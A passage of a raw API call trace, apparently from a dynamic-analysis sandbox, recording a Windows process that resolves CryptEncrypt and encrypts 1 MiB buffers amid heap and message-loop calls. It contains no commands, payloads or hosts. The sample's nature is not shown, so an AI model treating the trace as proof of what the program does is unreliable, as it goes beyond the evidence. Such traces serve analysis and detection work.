dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0192.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0192.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0192.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0192.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ae8 [0192.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0192.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.594] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0192.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0192.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0192.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54300 [0192.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0192.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0192.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0192.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0192.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0192.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0192.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0192.595] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0192.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0192.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0192.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0192.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0192.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0192.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0192.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0192.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0192.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0192.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0192.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0192.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0192.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0192.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0192.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0192.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0192.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0192.600] CharLowerBuffW (in: lpsz="byte[1048576]", cchLength=0xd | out: lpsz="byte[1048576]") returned 0xd [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0192.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0192.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0192.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0192.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0192.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0192.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0192.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0192.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0192.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0192.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0192.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129b020 | out: hHeap=0x970000) returned 1 [0192.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0192.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0192.787] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.787] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0192.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0192.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0192.955] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1180020*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x100000 | out: pbData=0x1180020*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0193.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0193.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0193.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0193.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0193.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0193.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0193.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0193.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0193.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0193.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0193.086] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0193.086] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0193.086] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0193.086] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0193.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0193.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0193.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0193.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0193.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0193.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0193.087] HeapFree (in: 